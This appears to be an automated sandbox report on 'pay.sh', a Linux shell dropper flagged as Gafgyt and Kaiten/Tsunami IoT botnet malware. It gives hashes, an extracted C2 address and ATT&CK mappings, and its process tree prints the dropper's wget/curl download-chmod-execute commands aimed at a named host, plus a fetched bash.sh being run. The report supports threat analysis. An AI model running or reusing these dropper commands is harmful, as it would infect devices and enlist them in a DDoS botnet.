Analysis
-
max time kernel
64s -
max time network
69s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
-
submitted
22-10-2024 16:06
General
-
Target
pay.sh
-
Size
3KB
-
MD5
cf70ee36f1e9247f2146e4981924d4f4
-
SHA1
7eabae4200118c4e89979658db6e4d905fe3dae9
-
SHA256
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c
-
SHA512
60f6bdf8813ee328f747b722e8d8abb8ecd91836a96de7e877217c6794d4dcef56130f3f833f748637b0a7b81bac94ea7e3d9cb3dfff0a2060eab34c20070bd0
Malware Config
Extracted
gafgyt
104.234.24.138:1990
Signatures
-
Detected Gafgyt variant 1 IoCs
-
Detects Kaiten/Tsunami Payload 2 IoCs
-
Detects Kaiten/Tsunami payload 2 IoCs
-
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
-
Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 4 IoCs
-
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
-
Modifies Bash startup script 2 TTPs 1 IoCs
-
Reads runtime system information 5 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 10 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/pay.sh/tmp/pay.sh1⤵
- Creates/modifies environment variables
- Modifies Bash startup script
-
/usr/bin/wgetwget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr02⤵
- Writes file to tmp directory
-
/usr/bin/curlcurl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr02⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x m3cr02⤵
- File and Directory Permissions Modification
-
/tmp/m3cr0./m3cr02⤵
- Executes dropped EXE
-
/bin/rmrm -rf m3cr02⤵
-
/bin/rmrm -rf m3cr0.12⤵
-
/usr/bin/wgetwget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch642⤵
- Writes file to tmp directory
-
/usr/bin/curlcurl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch642⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x zigaarch642⤵
- File and Directory Permissions Modification
-
/tmp/zigaarch64./zigaarch642⤵
- Executes dropped EXE
-
/bin/rmrm -rf zigaarch642⤵
-
/bin/rmrm -rf zigaarch64.12⤵
-
/usr/bin/wgetwget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x2⤵
- Writes file to tmp directory
-
/usr/bin/curlcurl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x x00x2⤵
- File and Directory Permissions Modification
-
/tmp/x00x./x00x2⤵
- Executes dropped EXE
-
/bin/rmrm -rf x00x2⤵
-
/bin/rmrm -rf x00x.12⤵
-
/usr/bin/wgetwget http://floodernetwork111.accesscam.org:8089/bash.sh2⤵
- Writes file to tmp directory
-
/usr/bin/curlcurl -O http://floodernetwork111.accesscam.org:8089/bash.sh2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/rmrm -rf bash.sh.12⤵
-
/bin/bashbash bash.sh2⤵
-
/usr/bin/wgetwget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr03⤵
- Writes file to tmp directory
-
/usr/bin/curlcurl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr03⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x m3cr03⤵
- File and Directory Permissions Modification
-
/tmp/m3cr0./m3cr03⤵
- Executes dropped EXE
-
/bin/rmrm -rf m3cr03⤵
-
/bin/rmrm -rf m3cr0.13⤵
-
/bin/sleepsleep 60003⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Privilege Escalation
Boot or Logon Autostart Execution
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
236B
MD58bbe815474c7d3ed318e958c05e1c95b
SHA136235a707a29d27b01570ef8c973c522f563c15c
SHA256469640f9d4de9b71c4720298f7eb585c403f5a13e55e2bedc0da3937dd8b8f5b
SHA512137a228141556d1fc6da421fd8bc45b81108908c39e734b235af6dca9b36dee059043f046dd2f670067a10db1e0280a0941f45c0b7ee1c774d1aa7f4cc2e756f
-
Filesize
983KB
MD575c00b238bd8105414cbb5d08601ca1a
SHA12a5e59555f348bfd9fa9fc4e3e04338ee4e74576
SHA256edbe8e5b476327cac01434634849de230eaeae5943e3cc6680aa8c6ccc29d361
SHA512a7198035e4dc090cc10d20c19d4f606d5e5d4bba4ea9ab54ed61dbdbe93da16c3a5a85eb4a0c9d39af8dbfc4c578f5a01c5aaa271b5c649e646341ad6ce300b5
-
Filesize
985KB
MD5f042a9131a6d06671e98c1ed1f8d80a8
SHA1dd97fac87e8d4a973dc4867524908f3384916f27
SHA256a70fdd8fa252beeca41955bee2d4ce3e6e1f6aa60746ee96ec59b96106080a6c
SHA512629282e501a77e08295260802427747288af6bca1c0695adb9325b9ce01b9e4b0f4a065c86829eeba5c91cfb66d2965d3de3968e87a3d277471a2216ea2eaafe
-
Filesize
73KB
MD548ea3c3566c796e4f74e8e3d6df15cd3
SHA1b1ef1574ced09471c26a4c749d5a4ab5ba7942cd
SHA25679b552ce829cd07000f0ff57dcc7970c43a8a0e2b75c4b0158acd4e24cb1f47a
SHA512cb5d342e421089ccba5be87ba64833ee90b78c2954b27719033fa56afbd4aae232b153ba45a7b4664886be8a5961890e54e92349af7e6ef517e7f0a3933928cd